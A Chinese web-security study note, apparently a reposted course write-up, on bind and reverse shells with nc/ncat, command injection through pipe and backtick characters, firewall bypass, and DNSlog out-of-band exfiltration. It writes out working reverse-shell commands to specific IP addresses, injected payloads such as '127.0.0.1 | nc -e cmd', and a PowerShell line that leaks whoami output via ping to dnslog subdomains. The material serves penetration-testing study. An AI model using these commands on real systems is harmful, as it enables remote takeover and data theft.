web安全学习笔记【05】——反弹Shell、正反向连接

这篇具有很好参考价值的文章主要介绍了web安全学习笔记【05】——反弹Shell、正反向连接。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

思维导图

web安全学习笔记【05】——反弹Shell、正反向连接,学习笔记,web安全,linux,学习,笔记

#知识点:

1、Web常规-系统&中间件&数据库&源码等

2、Web其他-前后端&软件&Docker&分配站等

3、Web拓展-CDN&WAF&OSS&反向&负载均衡等

-----------------------------------

1、APP架构-封装&原生态&H5&flutter等

2、小程序架构-Web&H5&JS&VUE框架等

-----------------------------------

1、渗透命令-常规命令&文件上传下载

2、反弹Shell-防火墙策略&正反向连接

3、数据回显-查询带外&网络协议层级

#章节点

应用架构:Web/APP/云应用/小程序/负载均衡等

安全产品:CDN/WAF/IDS/IPS/蜜罐/防火墙/杀毒等

渗透命令:文件上传下载/端口服务/Shell反弹等

抓包技术:HTTP/TCP/UDP/ICMP/DNS/封包/代理等

算法加密:数据编码/密码算法/密码保护/反编译/加壳等

web安全学习笔记【05】——反弹Shell、正反向连接,学习笔记,web安全,linux,学习,笔记web安全学习笔记【05】——反弹Shell、正反向连接,学习笔记,web安全,linux,学习,笔记

演示案例:

  • 实用案例1:文件上传下载-解决无图形化&解决数据传输
  • 实用案例2:反弹Shell命令-解决数据回显&解决数据通讯
  • 实际案例1:防火墙绕过-正向连接&反向连接&内网服务器
  • 实际案例2:防火墙组合数据不回显-ICMP带外查询Dnslog

#常规基本渗透命令详解

https://blog.csdn.net/weixin_43303273/article/details/83029138

#实用案例1:文件上传下载-解决无图形化&解决数据传输

命令生成:https://forum.ywhack.com/bountytips.php?download

Linux:wget curl python ruby perl java等

Windows:PowerShell Certutil Bitsadmin msiexec mshta rundll32等

自己构造

web安全学习笔记【05】——反弹Shell、正反向连接,学习笔记,web安全,linux,学习,笔记

web安全学习笔记【05】——反弹Shell、正反向连接,学习笔记,web安全,linux,学习,笔记

#实用案例2:反弹Shell命令-解决数据回显&解决数据通讯

命令生成:https://forum.ywhack.com/shell.php

1、正向连接:本地监听等待对方连接

Linux控制Windows

windows上面//绑定CMD到本地5566端口(需要下载第三方工具nc)

nc -e cmd -lvp 5566(命令含义:绑定cmd给到本地端口5566)

linux上面//主动连接目标5566(nc自带)

ncat 47.122.23.131 5566

监听任意来自5566端口的

web安全学习笔记【05】——反弹Shell、正反向连接,学习笔记,web安全,linux,学习,笔记

web安全学习笔记【05】——反弹Shell、正反向连接,学习笔记,web安全,linux,学习,笔记

web安全学习笔记【05】——反弹Shell、正反向连接,学习笔记,web安全,linux,学习,笔记

web安全学习笔记【05】——反弹Shell、正反向连接,学习笔记,web安全,linux,学习,笔记

Windows控制Linux

//绑定SH到本地5566端口

ncat -e /bin/sh -lvp 5566(把/bin/sh绑定到本地的5566)

//主动连接目标5566

nc 47.94.236.117 5566

linux将/bin/sh绑定到本地的5566

web安全学习笔记【05】——反弹Shell、正反向连接,学习笔记,web安全,linux,学习,笔记

windows监听linux的5566

web安全学习笔记【05】——反弹Shell、正反向连接,学习笔记,web安全,linux,学习,笔记

2、反向连接:主动给出去,对方监听

//绑定CMD到目标5566端口

ncat -e /bin/sh 47.122.23.131 5566

//等待5566连接

nc -lvvp 5566

web安全学习笔记【05】——反弹Shell、正反向连接,学习笔记,web安全,linux,学习,笔记

//绑定CMD到目标5566端口

nc -e cmd 47.94.236.117 5566

//等待5566连接

ncat -lvvp 5566

web安全学习笔记【05】——反弹Shell、正反向连接,学习笔记,web安全,linux,学习,笔记

linux想要找到某内网环境指定某个主机,只能通过反向连接,正向连接只能找到路由的IP地址,下面对应的的服务器找不到,但如果一定要通过正向连接的话,必须知道该服务器的端口号,即端口映射。

web安全学习笔记【05】——反弹Shell、正反向连接,学习笔记,web安全,linux,学习,笔记

实验:通过内网服务器找linux外网服务器

win10:内网ip:192.168.X.107   外网ip:171.X.X.52

外网linux:47.X.X.117

linux控制window

1、正向连接

不在同一个局域网下,主动找找不到107这个内网服务器

连接外网52也连不上是因为52是路由地址,路由地址并没有执行监听的操作

web安全学习笔记【05】——反弹Shell、正反向连接,学习笔记,web安全,linux,学习,笔记

2、反向连接

web安全学习笔记【05】——反弹Shell、正反向连接,学习笔记,web安全,linux,学习,笔记

windows控制linux

正向连接

web安全学习笔记【05】——反弹Shell、正反向连接,学习笔记,web安全,linux,学习,笔记

#实际案例1:防火墙绕过-正向连接&反向连接&内网服务器

管道符:| (管道符号) ||(逻辑或) &&(逻辑与)  &(后台任务符号)

Windows->| & || &&

Linux->; | || & && ``(特有``和;)

例子:

ping -c 1 127.0.0.1 ; whoami

ping -c 1 127.0.0.1 | whoami

ping -c 1 127.0.0.1 || whoami

ping -c 1 127.0.0.1 & whoami

ping -c 1 127.0.0.1 && whoami

ping -c 1 127.0.0.1 `whoami`

linux:

管道符| 执行后面的命令   ||两个命令都执行

web安全学习笔记【05】——反弹Shell、正反向连接,学习笔记,web安全,linux,学习,笔记

加反撇号

 web安全学习笔记【05】——反弹Shell、正反向连接,学习笔记,web安全,linux,学习,笔记

加;  ping报错 但是woami被执行

web安全学习笔记【05】——反弹Shell、正反向连接,学习笔记,web安全,linux,学习,笔记

windows:(没有;和反撇号)

web安全学习笔记【05】——反弹Shell、正反向连接,学习笔记,web安全,linux,学习,笔记

思考如何将输出的命令反弹到自己电脑上

1、判断windows(执行命令后权限是administrator)

web安全学习笔记【05】——反弹Shell、正反向连接,学习笔记,web安全,linux,学习,笔记

2、windows没有自带的nc(需要上传nc安装nc)

3、想办法上传nc 反弹权限(小迪这里准备好了nc地址 放在自己服务器上面的。由于对方是windows服务器,所以棱角生成的命令对应选择windows的)

web安全学习笔记【05】——反弹Shell、正反向连接,学习笔记,web安全,linux,学习,笔记

web安全学习笔记【05】——反弹Shell、正反向连接,学习笔记,web安全,linux,学习,笔记

web安全学习笔记【05】——反弹Shell、正反向连接,学习笔记,web安全,linux,学习,笔记

web安全学习笔记【05】——反弹Shell、正反向连接,学习笔记,web安全,linux,学习,笔记

执行之后查看windows 已经有nc.exe

web安全学习笔记【05】——反弹Shell、正反向连接,学习笔记,web安全,linux,学习,笔记

4、反弹

web安全学习笔记【05】——反弹Shell、正反向连接,学习笔记,web安全,linux,学习,笔记

web安全学习笔记【05】——反弹Shell、正反向连接,学习笔记,web安全,linux,学习,笔记

开启入站策略,采用反向连接

入站不行只能给出去

web安全学习笔记【05】——反弹Shell、正反向连接,学习笔记,web安全,linux,学习,笔记

Linux:ncat -lvvp 5566

Windows:127.0.0.1 | nc -e cmd 47.94.236.117 5566

开启出站策略,采用正向连接

但是一般防火墙入站没有允许5566通信的话 也连接不上 (出战一般是允许的)

web安全学习笔记【05】——反弹Shell、正反向连接,学习笔记,web安全,linux,学习,笔记

Linux:ncat -e cmd 47.122.23.131 5566

Windows:127.0.0.1 | nc -e cmd -lvvp 5566

正反向反弹案例-内网服务器

只能内网主动交出数据,反向连接

#实际案例2:防火墙组合数据不回显-ICMP带外查询Dnslog

web安全学习笔记【05】——反弹Shell、正反向连接,学习笔记,web安全,linux,学习,笔记

出站入站都开启策略(数据不回显):OSI网络七层

127.0.0.1 | powershell $x=whoami;$x=$x.Replace('\','xxx');$y='.f4an93.dnslog.cn';$z=$x+$y;ping $z

漏洞有,但是数据不回显:

1、反弹shell

2、带外查询

dnslog——反撇号命令(linux可以 但是windows不识别反撇号命令)

web安全学习笔记【05】——反弹Shell、正反向连接,学习笔记,web安全,linux,学习,笔记

web安全学习笔记【05】——反弹Shell、正反向连接,学习笔记,web安全,linux,学习,笔记

确定能执行命令

windows

` ` ;

ping 127.0.0.1 |

为什么要这样写

cmd无法执行whoami

用到powershell变量赋值 把whoami执行结果给变量

web安全学习笔记【05】——反弹Shell、正反向连接,学习笔记,web安全,linux,学习,笔记

此时dnslog还是无法回显 (因为\  所以将\用xxxx替换掉)

web安全学习笔记【05】——反弹Shell、正反向连接,学习笔记,web安全,linux,学习,笔记

web安全学习笔记【05】——反弹Shell、正反向连接,学习笔记,web安全,linux,学习,笔记

结果带有“\” 导致ping无法执行

powershell $x=whoami;$x=$x.Replace('\','xxx');$y='.vpod5d.dnslog.cn';$z=$x+$y;ping $z

127.0.0.1 | powershell $x=ver;$x=$x.Replace('\','xxx');$y='.vpod5d.dnslog.cn';$z=$x+$y;ping $z文章来源地址https://www.toymoban.com/news/detail-823926.html

到了这里,关于web安全学习笔记【05】——反弹Shell、正反向连接的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 2、安全开发-Python-Socket编程&端口探针&域名爆破&反弹Shell&编码免杀

    用途:个人学习笔记,欢迎指正! 目录 主要内容: 一、端口扫描(未开防火墙情况) 1、Python关键代码: 2、完整代码:多线程配合Queue进行全端口扫描 二、子域名扫描 三、客户端,服务端Socket编程通信cmd命令执行 1、客户端: 2、服务端: 四、python代码shellCode编码免杀后门上线

    2024年02月22日
    浏览(44)
  • 中间件安全:Apache Tomcat 弱口令.(反弹 shell 拿到服务器的最高控制权.)

    Tomcat  是 Apache 软件基金会(Apache Software Foundation)的 Jakarta 项目中的一个核心项目,由 Apache、Sun 和其他一些公司及个人共同开发而成。 通过弱口令登录后台,部署 war 包 geshell . 中间件安全:Apache Tomcat 弱口令. Apache Tomcat 弱口令: 靶场准备:Web安全:Vulfocus 靶场搭建.(漏

    2024年02月05日
    浏览(65)
  • 【Linux | Shell】Linux 安全系统 —— 用户、组、文件权限 - 阅读笔记

    Linux 安全系统的核心是 用户账户 。 用户权限是通过创建用户时分配的用户 ID( user ID, UID)来跟踪的。 UID 是个数值,每个用户都有一个唯一的 UID。 用户在登录系统时是使用登录名( login name)来代替 UID 登录的。 下面介绍 Linux 系统使用哪些 特定文件和工具 来跟踪及管理

    2024年02月13日
    浏览(43)
  • Linux--shell学习笔记(下)

    if…then 形式 类似于 ** C/C++ 中的 if-else ** 语句 单层 if 命令格式: 示例: 单层 if-else 命令格式: 示例: 多层 if-elif-elif-else 命令格式: 示例: case…esac 形式 类似于 ** C/C++ 中的 switch ** 语句 命令格式: 示例: for…in…do…done 命令格式: 示例1,输出a 2 cc,每个元素一行:

    2024年02月10日
    浏览(31)
  • Linux shell编程学习笔记29:shell自带的 脚本调试 选项

    Linux shell脚本的调试方法比较多,上次我们探讨和测试了shell内建命令set所提供的一些调试选项,其实 shell 本身也提供了一些调试选项。我们以bash为例来看看。 purleEndurer @ csdn ~ $ bash --help GNU bash, version 4.2.46(2)-release-(x86_64-redhat-linux-gnu) Usage:  bash [GNU long option] [option] ...      

    2024年02月04日
    浏览(57)
  • Linux shell编程学习笔记25:tty

    在 1830 年代和 1840 年代,开发了称为电传打字机(teletypewriters)的机器,这些机器可以将发件人在键盘上输入的消息“沿着线路”发送在接收端并打印在纸上。 电传打字机的名称由teletypewriters, 缩短为teletypes,并最终缩短为 TTY。 电传打字机:teletypewriters →  teletypes → t

    2024年02月05日
    浏览(55)
  • Linux shell编程学习笔记35:seq

    在使用 for 循环语句时,我们经常使用到序列。比如: for i in 1 2 3 4 5 6 7 8 9 10; do echo \\\"$i * 2 = $(expr $i * 2)\\\";  done 其中的 1 2 3 4 5 6 7 8 9 10; 就是一个整数序列 。 为了方便我们使用数字序列,Linux提供了seq命令,这个命令是取自单词 sequence 的前3个字母。比如: for i in $(seq 1 10) ;

    2024年02月04日
    浏览(46)
  • Linux shell编程学习笔记27:tput

    除了stty命令,我们还可以使用tput命令来更改终端的参数和功能。 tput 命令的主要功能有:移动更改光标、更改文本显示属性(如颜色、下划线、粗体),清除屏幕特定区域等。  tput [选项] [参数] 命令格式:   tput setab n : 设置背景色,set text attributes background color   tput

    2024年02月05日
    浏览(49)
  • Linux shell编程学习笔记39:df命令

    0 前言 1  df命令的功能、格式和选项说明 1.1 df命令的功能 1.2 df命令的格式 1.3 df命令选项说明  2 df命令使用实例  2.1  df:显示主要文件系统信息 2.2 df -a:显示所有文件系统信息 2.3 df -t[=]TYPE或--type[=]TYPE:显示TYPE指定类型的文件系统信息 2.4 df --total:追加显示统计信息 2

    2024年01月16日
    浏览(61)
  • Linux shell编程学习笔记40:stat命令

    “程序员必备的面试技巧,就像是编写一段完美的代码一样重要。在面试战场上,我们需要像忍者一样灵活,像侦探一样聪明,还要像无敌铁金刚一样坚定。只有掌握了这些技巧,我们才能在面试的舞台上闪耀光芒,成为那个令HR们心动的程序猿!” 目录 0 前言 1 DOS、Wind

    2024年01月19日
    浏览(57)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包